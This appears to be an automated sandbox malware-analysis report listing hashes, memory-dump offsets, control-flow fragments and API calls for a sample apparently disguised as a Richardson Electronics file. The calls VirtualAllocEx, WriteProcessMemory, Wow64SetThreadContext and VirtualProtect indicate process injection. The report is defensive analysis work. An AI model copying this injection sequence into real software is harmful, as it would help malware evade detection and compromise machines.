                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 4db47fe61d1883bc7ffe231353d4e220286dc379c7bb2efbcd326d43dfc064ab
                                                              • Instruction ID: 32d1ace690ea4d779fc6c2977eecc385c5a5ef60640c1ab02d37bc6df53f29f3
                                                              • Opcode Fuzzy Hash: 4db47fe61d1883bc7ffe231353d4e220286dc379c7bb2efbcd326d43dfc064ab
                                                              • Instruction Fuzzy Hash: 0E41CBB5D002199FDF00CFA9D880AEEBBF1BF49310F14A02AE425B7210D7799A45CB54

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 902 60bedf4-60bee53 904 60bee6a-60beecb WriteProcessMemory 902->904 905 60bee55-60bee67 902->905 909 60beecd-60beed3 904->909 910 60beed4-60bef26 904->910 905->904 909->910
                                                              APIs
                                                              • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 060BEEBB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201821823.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60b0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 631a52c2a68e75c23ffc6d255352de09ef63706212fe30f42a3efe48d765a334
                                                              • Instruction ID: 1e4feabcb7b4f8a589fe40668f7c313f8a82d2d4ea194b6c812423f868bb91ee
                                                              • Opcode Fuzzy Hash: 631a52c2a68e75c23ffc6d255352de09ef63706212fe30f42a3efe48d765a334
                                                              • Instruction Fuzzy Hash: A641BAB5D01259DFDF00CFA9D980AEEBBF1BF49310F20A02AE415BB250D7789A41CB54

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 924 60bec80-60bed42 VirtualAllocEx 928 60bed4b-60bed95 924->928 929 60bed44-60bed4a 924->929 929->928
                                                              APIs
                                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 060BED32
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201821823.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60b0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 53cf3e6b1f053c913475068d8d574a2fd68001bdd026f60746764e9ee8dc2415
                                                              • Instruction ID: 2080348a4d6002bca43c792607134cfc24758dd179ebf7f4c5ed55e04ac00701
                                                              • Opcode Fuzzy Hash: 53cf3e6b1f053c913475068d8d574a2fd68001bdd026f60746764e9ee8dc2415
                                                              • Instruction Fuzzy Hash: 5141BAB5D00258DFCF10CFA9D980ADEFBB1BB59310F10A42AE815B7200D775A901CFA5

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 934 60bee54-60bee69 935 60bee6a-60beead 934->935 936 60bee32-60bee53 934->936 939 60beeb4-60beecb WriteProcessMemory 935->939 936->934 936->935 940 60beecd-60beed3 939->940 941 60beed4-60bef26 939->941 940->941
                                                              APIs
                                                              • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 060BEEBB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201821823.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60b0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: b9c897ba2840ca8b091b24354931bb06537f6b67f9f82558418c261fd85274c4
                                                              • Instruction ID: b37f026a1f2f6fd772b4eedd1cd4b1d19b65ef431cc15f8e53bc759d7382fcb0
                                                              • Opcode Fuzzy Hash: b9c897ba2840ca8b091b24354931bb06537f6b67f9f82558418c261fd85274c4
                                                              • Instruction Fuzzy Hash: 6C31DE79D01249DFDF00CFA8D880AEDBBF0BF49314F14A06AE865BB250D7349952DB64

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 946 60bf28a-60bf290 947 60bf303-60bf38c VirtualProtect 946->947 948 60bf292-60bf2a2 946->948 955 60bf38e-60bf394 947->955 956 60bf395-60bf3e5 947->956 950 60bf2a9-60bf2c6 948->950 951 60bf2a4 948->951 951->950 955->956
                                                              APIs
                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 060BF37C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201821823.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60b0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: b62a5c5e363f1d3d5cf9b16464b98573ec3c2d8b8bde708efa6fc351192d3656
                                                              • Instruction ID: 91adc3d8df55988dc7bd2f0212185b4e0087b953d335c5298ec45726ab085b23
                                                              • Opcode Fuzzy Hash: b62a5c5e363f1d3d5cf9b16464b98573ec3c2d8b8bde708efa6fc351192d3656
                                                              • Instruction Fuzzy Hash: F0311DB5C012098FDF14DFA9E884AEEFBF1BF4A310F14A02AE814B7250C7759940CB59

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 963 60bf2d2-60bf38c VirtualProtect 967 60bf38e-60bf394 963->967 968 60bf395-60bf3e5 963->968 967->968
                                                              APIs
                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 060BF37C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201821823.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60b0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: 15bdb552edbb0e4ed153aecd08db34e78b554c17c2565029251a3b48d275b9cf
                                                              • Instruction ID: 02818c940af96f73f2304cb178794d1764e8c34d0a540ab1f9f7e8b74001b61e
                                                              • Opcode Fuzzy Hash: 15bdb552edbb0e4ed153aecd08db34e78b554c17c2565029251a3b48d275b9cf
                                                              • Instruction Fuzzy Hash: E431D9B5D002499FDF10CFAAD880AEEFBB0BF49310F14A02AE815B7210D775A945CFA4

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 973 60bec88-60bed42 VirtualAllocEx 976 60bed4b-60bed95 973->976 977 60bed44-60bed4a 973->977 977->976
                                                              APIs
                                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 060BED32
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201821823.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60b0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: a2d8c4090138f23bc5b72c7bc62a5cabb4015c282a07b4a9625e223cd4ea98b9
                                                              • Instruction ID: 3505892f9dd5bad88d2b6a3f8616fdfd0f66eb7e21345ab5dd0714f1d0556d53
                                                              • Opcode Fuzzy Hash: a2d8c4090138f23bc5b72c7bc62a5cabb4015c282a07b4a9625e223cd4ea98b9
                                                              • Instruction Fuzzy Hash: 8431A8B9D00258DFCF10CFA9D980ADEFBB1BB59310F10A42AE815B7200D775A901CF69
                                                              APIs
                                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 060BF37C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201821823.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60b0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: 9ecdbedd9cdf3750665dc2c85caa40d03896fb8207bd8f21e891bb8a5cc4131f
                                                              • Instruction ID: 6290a90d6288d72798f57de5fcd397709fc4a6a3cd578d9c79d0b157e1a3616c
                                                              • Opcode Fuzzy Hash: 9ecdbedd9cdf3750665dc2c85caa40d03896fb8207bd8f21e891bb8a5cc4131f
                                                              • Instruction Fuzzy Hash: 5631C8B5D002599FDF10CFAAD884AEEFBB0BF49310F14A02AE815B7210D779A945CF54
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 060BE7D7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201821823.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60b0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: e70429befec05c1f27a4c1aa9f4bb3fdfec83d1c32969ad625a06550e70b4412
                                                              • Instruction ID: 0611be64568a7d849ca8ab8574ca04846e3e6569ca485680315a5ea791e203aa
                                                              • Opcode Fuzzy Hash: e70429befec05c1f27a4c1aa9f4bb3fdfec83d1c32969ad625a06550e70b4412
                                                              • Instruction Fuzzy Hash: 3B41D9B4D012599FDF50CFA9D884AEEBBF0BF48310F24942AE419B7200C778A945CF94
                                                              APIs
                                                              • VirtualProtect.KERNEL32(?,?,?,?), ref: 062AD96C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202715159.00000000062A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_62a0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: 7a488965c2ac4f6e1eefb44f47aebcb595584d37477c3b028d8937f46dd28dee
                                                              • Instruction ID: 61646faf1ee613424a5a7312eafe2c17a06bd185c3adea2c59d4502fd498febe
                                                              • Opcode Fuzzy Hash: 7a488965c2ac4f6e1eefb44f47aebcb595584d37477c3b028d8937f46dd28dee
                                                              • Instruction Fuzzy Hash: E931A7B9D012499FDF10CFA9D980ADEFBB1BF49310F20942AE819B7210D775A945CF94
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 060BE7D7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201821823.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60b0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: a994114cd1212c473163b8c25c3cb1eb8401f73a93425db586866b14a6f619d7
                                                              • Instruction ID: f834a514ef1f24f22d7e4bfaf3d5ae71052b10c99531afd5d4c29fc73e4f221b
                                                              • Opcode Fuzzy Hash: a994114cd1212c473163b8c25c3cb1eb8401f73a93425db586866b14a6f619d7
                                                              • Instruction Fuzzy Hash: AF31CAB5D002589FDB10CFAAD884AEEBBF0BF48310F24902AE419B7240C778A945CF94
                                                              APIs
                                                              • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 060BEEBB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201821823.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60b0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 1d5bb3ea46cf1315d1a145b4b8d81449f54e8ff6486d231ff3936bc8e11ccd65
                                                              • Instruction ID: db9869c7f06feb870b4a469ce9636aa9a6bfa40c2da1bcc0c64dbee0e6df8187
                                                              • Opcode Fuzzy Hash: 1d5bb3ea46cf1315d1a145b4b8d81449f54e8ff6486d231ff3936bc8e11ccd65
                                                              • Instruction Fuzzy Hash: 34D012314002488EDB55D768C55878DBBE05F50318F28C058E00C971A1C7B95CC5C711
                                                              APIs
                                                              • VirtualAlloc.KERNEL32(?,?,?,?), ref: 062AEB2F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202715159.00000000062A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062A0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_62a0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 8bb5e78910556fb7eb72656d69421ce90831b9cc89d59280acf4d5dc9c194fcc
                                                              • Instruction ID: 0990fafd5a19e462260ada9fabc47a906c660c8e8fc2e25479a2524e865a498a
                                                              • Opcode Fuzzy Hash: 8bb5e78910556fb7eb72656d69421ce90831b9cc89d59280acf4d5dc9c194fcc
                                                              • Instruction Fuzzy Hash: 0631D8B4D00208DFDF10CFA9D880A9EFBB0BF49310F10942AE815B7210C775A941CF94
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: F
                                                              • API String ID: 0-1304234792
                                                              • Opcode ID: 398684815900de81291f79dd9025034724e099034d8be399feeec7e5c221a8e8
                                                              • Instruction ID: f3a1cc55e790d5c2c2cf9bdb5ff1a2f1bf4a810a4e9df0b3cce7cbc0aec76569
                                                              • Opcode Fuzzy Hash: 398684815900de81291f79dd9025034724e099034d8be399feeec7e5c221a8e8
                                                              • Instruction Fuzzy Hash: DB319374E40269CFEB61CF55D858BECBBB2BB49305F0485EAD40AA7250D7765A81CF10
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #
                                                              • API String ID: 0-1885708031
                                                              • Opcode ID: 62b5375862eb519b93c6ae1ec68289b7cf56a1d9fc587f28aa72499ec59e7a7f
                                                              • Instruction ID: a3016a1cd5757c6d98d5c9f1bc784f15caca96ff33f9583d80c11959e7bf27bb
                                                              • Opcode Fuzzy Hash: 62b5375862eb519b93c6ae1ec68289b7cf56a1d9fc587f28aa72499ec59e7a7f
                                                              • Instruction Fuzzy Hash: 1621BD78A41269CFDBA4CF14D854BDCBBF2BB09304F0085E9E50AA7280C7755E85CF04
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2203016343.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6510000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "
                                                              • API String ID: 0-123907689
                                                              • Opcode ID: ba66c9a842dff07e2498f647fb3e9ef73d055d9cf6ee3558580f88648fba8d58
                                                              • Instruction ID: 81e65a028277dbf004861ad5199dcedd4f6e3c8abf1c9003cfcd1ff5698a9798
                                                              • Opcode Fuzzy Hash: ba66c9a842dff07e2498f647fb3e9ef73d055d9cf6ee3558580f88648fba8d58
                                                              • Instruction Fuzzy Hash: BA21E474D42229CFEB64DF28D858BA9B7B5FB49304F1045DAD919A7680DB344EC4DF01
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 5
                                                              • API String ID: 0-2226203566
                                                              • Opcode ID: 69ebad56fb0255b34c57203b733346fb2bb36218d6f62056a4fa35f41084d01f
                                                              • Instruction ID: db21cb2b5cec9056674392f11f3eb0954dda402c6a4bd381d077d05e2a2de4e4
                                                              • Opcode Fuzzy Hash: 69ebad56fb0255b34c57203b733346fb2bb36218d6f62056a4fa35f41084d01f
                                                              • Instruction Fuzzy Hash: 4C115EB8E4122CCFDBA0DF65D858BDDBBB5AB49300F1085DAD50EA7260DB315A81CF51
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0
                                                              • API String ID: 0-4108050209
                                                              • Opcode ID: a304010945afe19aa9e25f485a96be51e8aff563a6527869df28cf058d504575
                                                              • Instruction ID: 1a6105f6f08c8a13822a8116a83fdbdf9ddc71c3bae134132581beddb437545c
                                                              • Opcode Fuzzy Hash: a304010945afe19aa9e25f485a96be51e8aff563a6527869df28cf058d504575
                                                              • Instruction Fuzzy Hash: 1811E5B4A40259CFDBA4DF54D950B9DBBFABB45304F1086EAD80AA7240C7319E86CF04
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: C
                                                              • API String ID: 0-1037565863
                                                              • Opcode ID: cc76e64d053d45f72291af855171f03e4588cddc9393374a8217813fb4ff0a86
                                                              • Instruction ID: 1fe66bfebd607cd9c9a4583b4ce5238518ba633f02c0b5728f9f930fd3746186
                                                              • Opcode Fuzzy Hash: cc76e64d053d45f72291af855171f03e4588cddc9393374a8217813fb4ff0a86
                                                              • Instruction Fuzzy Hash: 7901123594025ACBDB21DF54D800BE9BBB6FF4A304F108696E94A67240C772AA85CF80
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 7
                                                              • API String ID: 0-1790921346
                                                              • Opcode ID: 59b5fed1dd478d8d8c70313f73856e755349cb05bc472fdd91b9ed6898278d7b
                                                              • Instruction ID: 2b5e86a128a0d4f24031887ea567e0cf4cd22c5d33e273aeeeb82cc72596ac59
                                                              • Opcode Fuzzy Hash: 59b5fed1dd478d8d8c70313f73856e755349cb05bc472fdd91b9ed6898278d7b
                                                              • Instruction Fuzzy Hash: B9013CB4965228CFDB909F24D94878CBFB1EB05305F1088D9D24997242CF354AC59F55
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 5
                                                              • API String ID: 0-2226203566
                                                              • Opcode ID: 74a8885af08075bd9d4f02a746bee34f3226f011e96f25e0e432cd9e8911035e
                                                              • Instruction ID: abc4541a0b6ffbfe0f7e77882eb4f6567481e329c84f8ee2837a5fc367a05f78
                                                              • Opcode Fuzzy Hash: 74a8885af08075bd9d4f02a746bee34f3226f011e96f25e0e432cd9e8911035e
                                                              • Instruction Fuzzy Hash: FAF0AA70D61228CFEBA5CFA4C898BDDBBB5BB09318F0051DAE609A2680C7304AC4CF40
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: <
                                                              • API String ID: 0-4251816714
                                                              • Opcode ID: 49b2238e28f28e494e24359da91344bbda93c8fee3d5a787761e04ada4d24b4d
                                                              • Instruction ID: d7deb4ad2ac5052aa947bfa4d0b86cac096f0427cf0f78cee536d67198d4d668
                                                              • Opcode Fuzzy Hash: 49b2238e28f28e494e24359da91344bbda93c8fee3d5a787761e04ada4d24b4d
                                                              • Instruction Fuzzy Hash: AFF0A574945229CFDB64CF64C944BACBBF5BB09319F1882A9C809A3342D7759A86DF00
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201927415.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60d0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0
                                                              • API String ID: 0-4108050209
                                                              • Opcode ID: b53decc7231c094c5db16462e346a8f3f751467fa10adac33c7a150b2b04909e
                                                              • Instruction ID: 7cce60edfe2b58aaef7a2b773c12830649e6723f49a8bd2bf747d52d99b02c3c
                                                              • Opcode Fuzzy Hash: b53decc7231c094c5db16462e346a8f3f751467fa10adac33c7a150b2b04909e
                                                              • Instruction Fuzzy Hash: 0AE099B8A012188FDB50DF54C984A99BBB9AB48210F04C59A991AA7302D731AA82CF80
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2202049804.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_60f0000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 6
                                                              • API String ID: 0-498629140
                                                              • Opcode ID: 61242f112ce2ef91f2f7436192fa45522f4e1dcf9d32c0e2008385ec7b99212e
                                                              • Instruction ID: a9039daa95f82685b594de671e22d4a35ae9622540b3512917a7c8d8204fb8d4
                                                              • Opcode Fuzzy Hash: 61242f112ce2ef91f2f7436192fa45522f4e1dcf9d32c0e2008385ec7b99212e
                                                              • Instruction Fuzzy Hash: 6ED0C970A50229DFEBA0DF24D949B8E7BB5AF46344F0056D89149A2260CF711EC4CF01
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 87a8fbaab6823229ba2dcbc57e690589c8f0862367846f94d4973f034f06c9a1
                                                              • Instruction ID: 0539ce4604b0bcf9fa6ceab550113a48fd540c4cef565f8a8f4a79dfa6be1437
                                                              • Opcode Fuzzy Hash: 87a8fbaab6823229ba2dcbc57e690589c8f0862367846f94d4973f034f06c9a1
                                                              • Instruction Fuzzy Hash: C1521975A002288FDB68DF69C940BEDBBF2BF88300F1541D9E549AB391DA709D84CF61
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201487274.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6050000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 045b62009d837420efc47499ee102f18bc7a22b4e66e6958bef6f954bc8bd4e1
                                                              • Instruction ID: f3d74e06995591004824639107e6a8c801437894c269a07f5dd9b2b175b0904a
                                                              • Opcode Fuzzy Hash: 045b62009d837420efc47499ee102f18bc7a22b4e66e6958bef6f954bc8bd4e1
                                                              • Instruction Fuzzy Hash: 5E42F374E50209CFDB98DFA4C458AAFBBB2FB48315F119059D912AB390CB785D82CF91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b5d426abb6467df2b2eb336d6279c6167d17b5b3b5276d31986f6087dfa873fe
                                                              • Instruction ID: 7ecfa1425824e89704d53ae1d5de0d57456d87e74ca92c320a65298a05c5172f
                                                              • Opcode Fuzzy Hash: b5d426abb6467df2b2eb336d6279c6167d17b5b3b5276d31986f6087dfa873fe
                                                              • Instruction Fuzzy Hash: 00229D35A40205DFDB84CF65D490AADBBF6FF88314F148169E906AB3A5CB71ED84CB90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1cdcb7431f60dafe598b4242f795f003ac0b77d54ca5ec92670fcd11989268ee
                                                              • Instruction ID: 6befded614426a56a939924d4b87dd69b55a74646d3b1721e2c55494a71d6d40
                                                              • Opcode Fuzzy Hash: 1cdcb7431f60dafe598b4242f795f003ac0b77d54ca5ec92670fcd11989268ee
                                                              • Instruction Fuzzy Hash: 74125D30A40205CFDBA8DFA5C854A6EBBF2FF84304F148569E5469B391DB75EC46CB90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d6ad619642373b51d856db5178579104a072f8bc7a543b524432fbe88d09fd29
                                                              • Instruction ID: 1b5bebca62313a5c48344b410067fea74642f782c43a6867253182036ff9542b
                                                              • Opcode Fuzzy Hash: d6ad619642373b51d856db5178579104a072f8bc7a543b524432fbe88d09fd29
                                                              • Instruction Fuzzy Hash: 8F122A34B402198FCB54EF65C894A9DBBB2BF89300F5185A8E54AAB395DF30ED85CF40
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dd66c37413ce64aa09a5b425023c64af009ec7376d384b6baa95556de46b1752
                                                              • Instruction ID: 5fa408639f84e1b11727f535016efe3257cc72a87fcbe3e1649f2242b7be4f25
                                                              • Opcode Fuzzy Hash: dd66c37413ce64aa09a5b425023c64af009ec7376d384b6baa95556de46b1752
                                                              • Instruction Fuzzy Hash: D5E1A0B07902028FD799EF6AC85077E7EE2EF94200F144429E586CB395DB74CC95C752
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5f9a157dfe158001dbefce774754b01957f1f224eb24c0ad05525e46e2717edd
                                                              • Instruction ID: 7be26a67fc17186a0e1f7ec3980433f34c85bcf617914c929b0753efb93b8d3e
                                                              • Opcode Fuzzy Hash: 5f9a157dfe158001dbefce774754b01957f1f224eb24c0ad05525e46e2717edd
                                                              • Instruction Fuzzy Hash: 64F13134A41209DFCB48EFA5D49499DBBB2FF89310F148569F846AB3A4DB30EC45CB91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2201527617.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6060000_Richardson Electronics, LTD.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
